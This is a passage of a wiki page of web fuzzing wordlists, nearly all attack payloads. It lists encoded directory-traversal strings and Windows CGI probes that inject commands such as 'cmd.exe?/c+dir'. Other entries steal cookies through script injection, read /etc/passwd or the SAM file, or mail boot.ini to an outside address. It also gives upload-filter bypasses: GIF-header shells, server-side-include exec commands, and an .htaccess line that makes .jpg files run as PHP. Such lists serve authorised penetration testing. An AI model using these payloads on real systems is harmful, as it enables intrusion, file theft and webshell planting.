%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
